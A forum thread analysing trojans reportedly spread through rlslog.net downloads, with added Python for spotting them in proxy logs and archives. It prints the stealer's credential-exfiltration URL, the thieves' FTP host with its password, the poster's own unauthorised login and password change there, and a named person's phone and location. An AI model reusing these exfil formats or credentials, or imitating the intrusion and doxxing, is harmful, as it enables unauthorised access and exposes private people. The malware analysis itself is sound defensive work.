

Rlslog.net uses trojans to steal and sell rapidshare accounts

']['€AM€LiT€ Forum - News, Reports and Alerts

 
Vektor, 2009-06-12 20:52:22
It is a well-known fact that rlslog.net is spreading iStealer trojans which collect all locally stored passwords. The last known trojan saved a file called u16event.dat and uploaded it via FTP to sv4.altushost.com . Usually an NSIS installer extracts 2 executable files, and one of them is the trojan (known names used are Server 89.exe, Iexplore.exe and Firefox.exe).

That FTP account no longer works now, so I assumed they are spreading an updated trojan, and I was right. The method is the same: an NSIS installer extracts 2 executables into the Temp directory, one named after the installer and the other Fizezilla.exe (which is currently not detected by any antivirus). This trojan no longer uploads to FTP.
The trojan is packed with a modified VBCrypt (local path to encryption program's project: C:\A\oPWouwTmTKi.vbp / C:\A\tAwDaPtcNxjaUmGF.pdb ), it decrypts and executes a modified variant of iStealer, which collects all locally stored passwords and calls http://warezbb.info/Dont_Bother/index.php?action=add, with the following parameters:
  • a = resource type (eg.: 8 = no-ip, 10 = firefox password)
  • u = URL
  • l = login name
  • p = password
  • c = computer name

For example, for http://www.example.com , user: user, password: password, computer name: computer, the trojan would send a HTTP GET request for the following URL: http://warezbb.info/Dont_Bother/index.php?action=add&a=10&u=%68%74%74%70%3A%2F%2F%77%77%77%2E%65%78%61%6D%70%6C%65%2E%63%6F%6D&l=%75%73%65%72&p=%70%61%73%73%77%6F%72%64&c=%63%6F%6D%70%75%74%65%72 (where "a" is 10 for Firefox passwords, "u" is the hex escaping for "http://www.example.com", etc.). For each password the trojan makes a request like this. Of course, warezbb.info is also hosted by altushost (91.214.44.123 = eu25.altushost.com).

warezbb.info wrote:
Domain ID:D26912061-LRMS
Domain Name:WAREZBB.INFO
Created On:15-Nov-2008 22:10:18 UTC
Last Updated On:02-Jun-2009 06:30:42 UTC
Expiration Date:15-Nov-2009 22:10:18 UTC
Sponsoring Registrar:Dynadot LLC (R259-LRMS)
Status:CLIENT TRANSFER PROHIBITED
Registrant ID:CP-47333
Registrant Name:Shahrukh c/o Dynadot Privacy
Registrant Organization:
Registrant Street1:PO Box 701
Registrant Street2:
Registrant Street3:
Registrant City:San Mateo
Registrant State/Province:CA
Registrant Postal Code:94401
Registrant Country:US
Registrant Phone:+1.6505851961
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:privacy@dynadot.com
Admin ID:CP-47333
Admin Name:Shahrukh c/o Dynadot Privacy
Admin Organization:
Admin Street1:PO Box 701
Admin Street2:
Admin Street3:
Admin City:San Mateo
Admin State/Province:CA
Admin Postal Code:94401
Admin Country:US
Admin Phone:+1.6505851961
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:privacy@dynadot.com
Billing ID:CP-47333
Billing Name:Shahrukh c/o Dynadot Privacy
Billing Organization:
Billing Street1:PO Box 701
Billing Street2:
Billing Street3:
Billing City:San Mateo
Billing State/Province:CA
Billing Postal Code:94401
Billing Country:US
Billing Phone:+1.6505851961
Billing Phone Ext.:
Billing FAX:
Billing FAX Ext.:
Billing Email:privacy@dynadot.com
Tech ID:CP-47333
Tech Name:Shahrukh c/o Dynadot Privacy
Tech Organization:
Tech Street1:PO Box 701
Tech Street2:
Tech Street3:
Tech City:San Mateo
Tech State/Province:CA
Tech Postal Code:94401
Tech Country:US
Tech Phone:+1.6505851961
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:privacy@dynadot.com
Name Server:NS5.ALTUSHOST.COM
Name Server:NS6.ALTUSHOST.COM


ns5.altushost.com wrote:
warezbb.info. SOA ns5.altushost.com shahrukh.it.live.com. (2009060202 86400 7200 3600000 86400)
warezbb.info. MX 0    warezbb.info
warezbb.info. NS ns5.altushost.com
warezbb.info. NS ns6.altushost.com
warezbb.info. A 91.214.44.123
cpanel A 91.214.44.123
ftp A 91.214.44.123
localhost A 127.0.0.1
mail CNAME warezbb.info
webdisk A 91.214.44.123
webmail A 91.214.44.123
whm A 91.214.44.123
www CNAME warezbb.info
warezbb.info. SOA ns5.altushost.com shahrukh.it.live.com. (2009060202 86400 7200 3600000 86400)


The mail addresses shahrukh.it@live.com and shahrukh.it@gmail.com were used to register accounts on other forums by users who were selling rapidshare accounts. Registered nicknames: farrukh rkr, shahrukh_pro, shahrukh khalid, dr00n (rlslog.net staff), devilwing, etc.

http://www.webmasterforums.com/buy-sell-ad-space/16787-bulk-rapidshare-seller-offical-legit.html , user: shahrukh_pro wrote:
Hey guys
I Knw m new here but m a trsuted seller but only in bulks
Legit Accounts One month Made from points
BULK $4.5 Per Month
or pr 10k
Price may Differ for BULK
Thankx
Shahrukh.it@live.com Add me msn


http://www.bzimage.org/showthread.php?t=8534 , user: shahrukh_pro wrote:
Hello Guys
I am a Rapidshare Seller Also Available in bulk minimum 5 accounts
one month fresh Created With points $5 Per month Accounts.
shahrukh.it@live.com
only Bulk buyers


http://www.domainnameforumz.com/showthread.php?t=5382 , user: shahrukh_pro wrote:
m Selling it Buddy 1 Month just for $5 shahrukh.it@live.com
add me if u want more


http://www.warezscene.org/archive/index.php/t-324816.html , user: BBproz wrote:
Hey Guys
I Got 1200+ Rapidshare Accounts And i am Giving That For a Simple Task
First 10 Ppls Will Get 6 to 8 Months Accounts So Just Replay Here For The Task And Get Accounts :)


This is the same dr00n as the one registered on many blogs and forums that have rapidshare links:
http://www.pakgamers.com/forums/other/22818-ipod-shuffle-2.html , user: dr00n  wrote:
OK bro Max i can give is 3k
If yes then sms me
03212879757
shahrukh

i live in karachi clifton
i can give 3000 but urgent sms me plz
03212879757


http://www.wiredpakistan.com/forums/viewtopic.php?id=2874 , shahrukh_pro wrote:
Hey Guys M selling premium Rapidshare accounts m selling them very cheap shared accounts
Rules:
The account will be sold to 2 persons and u cant change the password..
6 Months Account only for 1000    (8 Months Acc)
3 Months Account for 600            (4 Months Acc)
1 Month only for 250                   (45 Days Acc)

Anybody Interested Contact Me..
03212879757 Shahrukh

EDITED PACKAGES

...

m live in karachi
but it doesnt matter where do i live u have to pay in the form of mobile cards

____________________
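The request format above is enough to decode what was taken from a compromised machine out of a web proxy log. The following Python is an added example, not code from Vektor's post. It assumes a proxy log line of the form '<timestamp> <client_ip> <method> <url>' and only knows the two resource-type codes (8 and 10) the post names; the sample log lines are constructed, the first one being the exact example URL from the post.

```python
from urllib.parse import urlsplit, parse_qs

# Resource-type codes for the "a" parameter that the post documents; any
# other code is reported numerically because its meaning is not known here.
RESOURCE_TYPES = {8: "no-ip", 10: "firefox"}

# Path of the PHP logger named in the post.
EXFIL_PATH = "/Dont_Bother/index.php"


def hex_escape(s):
    """Escape every byte as %XX with no safe set, which is the encoding the
    stealer uses for u, l, p and c (compare the example URL in the post)."""
    return "".join("%%%02X" % b for b in s.encode("utf-8"))


def build_exfil_url(code, url, login, password, computer):
    """Reconstruct the GET request the stealer would issue for one record.
    Useful for generating test traffic against a proxy or IDS rule."""
    return "http://warezbb.info%s?action=add&a=%d&u=%s&l=%s&p=%s&c=%s" % (
        EXFIL_PATH, code, hex_escape(url), hex_escape(login),
        hex_escape(password), hex_escape(computer))


def decode_exfil_url(url):
    """Return the stolen record as a dict if `url` is an exfil request of the
    form described in the post, otherwise None. parse_qs percent-decodes the
    values, so the hex-escaped strings come back as cleartext."""
    parts = urlsplit(url)
    if parts.path != EXFIL_PATH:
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    if qs.get("action") != ["add"]:
        return None
    try:
        code = int(qs.get("a", ["-1"])[0])
    except ValueError:
        code = -1
    return {
        "type": RESOURCE_TYPES.get(code, "unknown(%d)" % code),
        "url": qs.get("u", [""])[0],
        "login": qs.get("l", [""])[0],
        "password": qs.get("p", [""])[0],
        "computer": qs.get("c", [""])[0],
    }


# Constructed sample proxy log (not taken from the post). Assumed format:
# '<timestamp> <client_ip> <method> <url>'. Line 1 is the exact example URL
# from the post, line 2 a no-ip record, line 3 unrelated traffic to the host.
SAMPLE_LOG = """\
2009-06-12T20:40:01 10.0.0.5 GET http://warezbb.info/Dont_Bother/index.php?action=add&a=10&u=%68%74%74%70%3A%2F%2F%77%77%77%2E%65%78%61%6D%70%6C%65%2E%63%6F%6D&l=%75%73%65%72&p=%70%61%73%73%77%6F%72%64&c=%63%6F%6D%70%75%74%65%72
2009-06-12T20:40:02 10.0.0.5 GET http://warezbb.info/Dont_Bother/index.php?action=add&a=8&u=&l=%64%79%6E%75%73%65%72&p=%68%75%6E%74%65%72%32&c=%63%6F%6D%70%75%74%65%72
2009-06-12T20:41:10 10.0.0.7 GET http://warezbb.info/index.php
"""


def scan_proxy_log(text):
    """Return a list of (client_ip, record) for every exfil request in the
    log. The stealer sends one request per credential, so one hit equals
    one leaked password."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        rec = decode_exfil_url(fields[3])
        if rec is not None:
            hits.append((fields[1], rec))
    return hits


if __name__ == "__main__":
    for ip, rec in scan_proxy_log(SAMPLE_LOG):
        print("%s leaked %s credential for %r (login %r, host %r)" % (
            ip, rec["type"], rec["url"], rec["login"], rec["computer"]))
```

Run as-is to decode the constructed sample; against a real log, feed the file contents to scan_proxy_log and adjust the field index if your proxy writes a different column order. build_exfil_url reproduces the post's example URL byte for byte, which is handy for checking that a rule matching action=add on that path actually fires before relying on it.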
Vektor, 2009-06-13 15:01:03
Another trojan that can be found in archives posted on rlslog.net is a password stealer written in Visual Basic that always comes with MSINET.OCX (usually with the hidden attribute). If you see MSINET.OCX in a downloaded archive with some executable files in it, don't execute anything and delete that archive.
While the other trojan searches only for Process Monitor and Ethereal / Wireshark window class names, this one also searches for WMWARE, VBOX, Sandboxie, Anubis, ThreatExpert, CWSandbox and JoeBox (http://www.opensc.ws/snippets/3558-detect-5-different-sandboxes.html). The trojan spreader's local path to this VB project: C:\Stealer\Server\Project1.vbp .

This trojan makes a text file with the following format:

Code:
--------------------------------------------------
Protocol:
Username:
Password:
--------------------------------------------------

HALF LIFE KEY:
COUNTER STRIKE KEY:
DREAMWEAVER ULTRA DEV4 KEY:
SYMANTEC KEY:
ADOBE PHOTOSHOP 7.0 KEY:
NERO BURNING ROM 5 KEY:
ULEAD PHOTOIMPACT 7.0 KEY:
SIBELIUS 2 KEY:
MIRC USERNAME:
MIRC KEY:
WINZIP NAME:
WINZIP KEY:
UT2003 KEY:
THE SIMS KEY:
THE SIMS HOT DATE KEY:
THE SIMS HOUSE PARTY KEY:
THE SIMS UNLEASHED DATE KEY:
THE SIMS VACATION DATE KEY:
PROJECT IGI 2 RETAIL KEY:
BATTLEFIELD 1942 KEY:
RAINBOW SIX III RAVENSHIELD KEY:
THE GLADIATORS KEY:
NEED FOR SPEED HOT PURSUIT 2 KEY:
FIFA 2003 KEY:
C&C GENERALS KEY:
RED ALERT 2 KEY:
TIBERIAN SUN KEY:
--------------------------------------------------

NO-IP User:
NO-IP Pass:
--------------------------------------------------

Pidgin Info:
--------------------------------------------------

FileZilla Info:
--------------------------------------------------

Firefox Data:
--------------------------------------------------

Yahoo User:Text3
Yahoo Pass:Text4
--------------------------------------------------



The text file is named after the local computer name and is uploaded to ftp://jackfruit.justfree.com using the account jackfruit with password h870881 (e-mail used to register it: choaschoi@yahoo.com ).

ftp://jackfruit.justfree.com wrote:
Connect to: (12.06.2009 9:12:40 PM)
hostname=jackfruit.justfree.com
username=jackfruit
startdir=
jackfruit.justfree.com=205.134.162.147
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 13 of 200 allowed.
220-Local time is now 14:11. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 2 minutes of inactivity.
USER jackfruit
331 User jackfruit OK. Password required
PASS ***********
230-User jackfruit has group access to:  vhosts  
230-OK. Current restricted directory is /
230 4 Kbytes used (0%) - authorized: 2048000 Kb
SYST
215 UNIX Type: L8
FEAT
211-Extensions supported:
EPRT
IDLE
MDTM
SIZE
REST STREAM
MLST type*;size*;sizd*;modify*;UNIX.mode*;UNIX.uid*;UNIX.gid*;unique*;
MLSD
TVFS
ESTP
PASV
EPSV
SPSV
ESTA
AUTH TLS
PBSZ
PROT
211 End.
Connect ok!
PWD
257 "/" is your current location
Get directory
TYPE A
200 TYPE is now ASCII
PASV
227 Entering Passive Mode (205,134,162,147,52,21)
LIST
150 Accepted data connection
Download
Waiting for server...
226-Options: -l
226 2 matches total
DELE VIC-PC.txt
250-2 Kbytes used (0%) - authorized: 2048000 Kb
250 Deleted VIC-PC.txt


Since the password is hardcoded in the trojan .exe, a password change would prevent it from uploading anything to that FTP. So I changed the password for it (as long as the password is not h870881, no trojan can upload anything to it).
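The rule given at the top of this post (MSINET.OCX sitting next to executables in a downloaded archive means do not run anything and delete it) can be checked before anything is extracted. The following Python is an added example and not Vektor's code. It assumes zip archives (zipfile from the standard library), that the hidden flag is stored as the MS-DOS attribute byte of the zip entry, which Windows archivers do, and that the listed suffixes are what counts as an executable; the sample archive is constructed in memory with dummy contents.

```python
import io
import zipfile

# MS-DOS attribute bits live in the low byte of ZipInfo.external_attr when
# the archive was built on Windows; 0x02 is the hidden attribute.
DOS_HIDDEN = 0x02

# Assumption: these suffixes count as "executable files" for the rule.
EXEC_SUFFIXES = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd")

MARKER = "msinet.ocx"


def assess_archive(data):
    """Apply the rule from the post to a zip archive given as bytes:
    MSINET.OCX together with executables means do not run anything.
    Returns the evidence found plus a verdict of 'DELETE' or 'ok'."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        infos = zf.infolist()
    # Match on the basename so a copy tucked into a subfolder still counts.
    markers = [i for i in infos
               if i.filename.rsplit("/", 1)[-1].lower() == MARKER]
    execs = [i.filename for i in infos
             if i.filename.lower().endswith(EXEC_SUFFIXES)]
    return {
        "has_msinet": bool(markers),
        "msinet_hidden": any(i.external_attr & DOS_HIDDEN for i in markers),
        "executables": execs,
        "verdict": "DELETE" if markers and execs else "ok",
    }


def build_sample_archive(include_ocx=True, hidden=True):
    """Constructed test archive (not a real release): a placeholder
    executable, a readme and optionally a hidden MSINET.OCX. The byte
    contents are dummies; only the names and attributes matter here."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Setup.exe", b"MZ placeholder")
        zf.writestr("readme.txt", b"dummy text")
        if include_ocx:
            info = zipfile.ZipInfo("MSINET.OCX")
            info.external_attr = DOS_HIDDEN if hidden else 0
            zf.writestr(info, b"MZ placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    paths = sys.argv[1:]
    if not paths:
        # No archives given: run against the constructed sample.
        print("sample archive:", assess_archive(build_sample_archive()))
    for path in paths:
        with open(path, "rb") as f:
            print(path, assess_archive(f.read()))
```

Pass archive paths on the command line to check real downloads. Most release archives on such sites are RAR rather than zip; the same entry walk works with the third-party rarfile module (its RarInfo mirrors ZipInfo) or by parsing the listing from unrar. The check is a name-based heuristic: a dropper that renames the control or nests it in a second archive will pass, so treat it as a first filter ahead of detonation in a sandbox, which, as the post notes, this family tries to detect.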
[-TE-]-Methodman, 2009-06-13 16:35:13
just for fun

http://jackfruit.justfree.com/  

http://img14.imageshack.us/img14/9266/84752459.jpg

Vektor, 2010-12-09 16:05:28
New host for logs sent by trojans posted on rlslog.net: http://genuinekeyz.com/ (213.5.66.161 = hosted-by.altushost.com), each directory has a php logger used by a different trojan.

genuinekeyz.com wrote:
Index of /
Name                         Last modified         Size  Description
   
$ush                         02-Sep-2010 12:30        -       
Hax0r                        14-Sep-2010 14:30        -       
Jmr0x                        12-Sep-2010 16:40        -       
NuW@n                        27-Sep-2010 13:19        -       
X91i                         14-Sep-2010 14:30        -       
cgi-bin                      29-Sep-2010 19:39        -       
ftp                          09-Dec-2010 13:08        -       
rcxxteer                     17-Nov-2010 14:27        -       
s@nsh                        27-Sep-2010 21:05        -       
xxxyxxx                      27-Sep-2010 14:09        -       
Proudly Served by LiteSpeed Web Server at genuinekeyz.com Port 80




Desperate attempt from the same hosted-by.altushost.com to spam this website:

79.142.64.19 = hosted-by.altushost.com wrote:
Code:
[11:42] <-TE-> Web report from IP: 79.142.64.19 ( snkpidz ):
"ZVGyX1  <a href="http://fgdrkiehyebh.com/">fgdrkiehyebh</a>, [url=http://tygsodnozayu.com/]tygsodnozayu[/url], [link=http://nvgoxsubviop.com/]nvgoxsubviop[/link], http://szhcsrguujlm.com/"
[11:42] <-TE-> Web report from IP: 79.142.64.19 ( bjypcb ):
"jhSvEs  <a href="http://jgfujmitzbgf.com/">jgfujmitzbgf</a>, [url=http://otocynzarxuq.com/]otocynzarxuq[/url], [link=http://jdwhcekkrhqv.com/]jdwhcekkrhqv[/link], http://saxjexabzpec.com/"
[11:47] <-TE-> Web report from IP: 79.142.64.19 ( bzpnooudy ):
"AvNWC0  <a href="http://nhgkkruaanzi.com/">nhgkkruaanzi</a>, [url=http://tvoxfaltnilx.com/]tvoxfaltnilx[/url], [link=http://sopxvbqagunz.com/]sopxvbqagunz[/link], http://tcwdbaypyxzc.com/"
[11:47] <-TE-> Web report from IP: 79.142.64.19 ( deacwfs ):
"eqCtOr  <a href="http://dqxmxzrjnbry.com/">dqxmxzrjnbry</a>, [url=http://mqlclgipszbc.com/]mqlclgipszbc[/url], [link=http://tfeazpixszcd.com/]tfeazpixszcd[/link], http://dgivfccbmatu.com/"
[11:52] <-TE-> Web report from IP: 79.142.64.19 ( hokzoblqr ):
"hEJGA8  <a href="http://isssfggrhzef.com/">isssfggrhzef</a>, [url=http://zpougirxcydm.com/]zpougirxcydm[/url], [link=http://zxpiyovraqdo.com/]zxpiyovraqdo[/link], http://otxkueakvoql.com/"
[11:53] <-TE-> Web report from IP: 79.142.64.19 ( fsrvfpkrlw ):
"QjquHE  <a href="http://oswdqyquaneh.com/">oswdqyquaneh</a>, [url=http://zldfsovgixrx.com/]zldfsovgixrx[/url], [link=http://ftxfygnqeprq.com/]ftxfygnqeprq[/link], http://wzvygxjuztez.com/"
[12:00] <-TE-> Web report from IP: 79.142.64.19 ( htepqwntaf ):
"rbZj9i  <a href="http://otbytyucwmrr.com/">otbytyucwmrr</a>, [url=http://acdnzrxgqmqf.com/]acdnzrxgqmqf[/url], [link=http://dmoxjigrcbon.com/]dmoxjigrcbon[/link], http://vicfoupnvkmu.com/"


nemesis.te-home.net wrote:
[2010-12-09 01:44:21] 79.142.64.19 POST /report?return=/index.html?contact=2 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" http://nemesis.te-home.net/index.html?contact

...

[2010-12-09 02:13:20] 79.142.64.19 POST /report?return=/index.html?contact=2 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" http://nemesis.te-home.net/index.html?contact
[2010-12-09 02:13:20] 79.142.64.19 GET /index.html?contact "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" http://nemesis.te-home.net/index.html?contact
[2010-12-09 02:13:20] 79.142.64.19 GET /index.html?contact "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
[2010-12-09 02:13:20] 79.142.64.19 GET /index.html?contact "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" http://nemesis.te-home.net/index.html?contact

...

[2010-12-09 02:24:27] 79.142.64.19 GET /index.html?contact "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
[2010-12-09 02:24:27] 79.142.64.19 POST /report?return=/index.html?contact=2 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" http://nemesis.te-home.net/index.html?contact


Fail.